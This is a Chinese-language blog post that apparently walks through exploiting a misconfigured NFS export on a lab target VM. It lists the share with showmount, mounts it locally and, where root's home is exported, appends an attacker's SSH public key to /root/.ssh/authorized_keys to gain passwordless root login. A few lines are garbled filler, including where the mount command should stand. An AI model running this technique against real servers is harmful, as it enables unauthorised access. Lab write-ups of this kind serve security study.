Menu

NFS配置不当复现

0 Comment

漏洞原理

漏洞形成的原理就是权限不对,/etc/exports这个文件中的权限设置采用的是root权限,所以导致服务器被入侵。

基本信息

NFS:(Network File System)网络文件系统,允许网络上的用户以类似于本地存储的方式访问共享文件夹,现代 NFS 实现包含防止误导导出的文件夹的功能,但遗留系统中的 NFS 服务未配置正确,可能会被滥用。
NFS默认端口:2049

复现

靶机:Typhoon-v1.02 192.168.15.140
攻击机: 192.168.15.1
首先我们看到靶机开通了NFS服务
谢谢
也可以用rpcinfo来进行探测

确定主机上有 mountd 和 NFS 服务运行
列出可以导出的文件夹
showmount -e 192.168.15.140

也就是在/typhoon下的所有文件在整个内网段都是可以共享的

如果显示为这样才是配置合理的,说明只对限定的IP进行共享

下面我们就对这个靶机的/typhoon目录进行挂载
将这个hi 就哦婆婆好
这就是将靶机的/typhoon目录挂载到了本机的/tmp/test目录下
让我们来看看test目录下是否挂载成功

我们看到挂载成功!

如果说共享的目录是/根目录的话,就可以进一步的利用

我们就可以在本地ssh-keygen生成一对RSA
密钥形式登录的原理是:利用密钥生成器制作一对密钥——一只公钥和一只私钥。将公钥添加到服务器的某个账户上,然后在客户端利用私钥即可完成认证并登录

[root@host ~]$ ssh-keygen <== 建立密钥对
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): <== 按 Enter
Created directory '/root/.ssh'.
Enter passphrase (empty for no passphrase): <== 输入密钥锁码,或直接按 Enter 留空
Enter same passphrase again: <== 再输入一遍密钥锁码
Your identification has been saved in /root/.ssh/id_rsa. <== 私钥
Your public key has been saved in /root/.ssh/id_rsa.pub. <== 公钥
The key fingerprint is:
0f:d3:e7:1a:1c:bd:5c:03:f1:19:f1:22:df:9b:cc:08 root@host
密钥锁码在使用私钥时必须输入,这样就可以保护私钥不被盗用。当然,也可以留空,实现无密码登录。

cat /root/.ssh/id_rsa.pub >> /tmp/test/root/.ssh/authorized_keys
把生成的公钥追加到靶机dauthorized_keys目录下,实现ssh免密码登录

标签:

发表评论

电子邮件地址不会被公开。 必填项已用*标注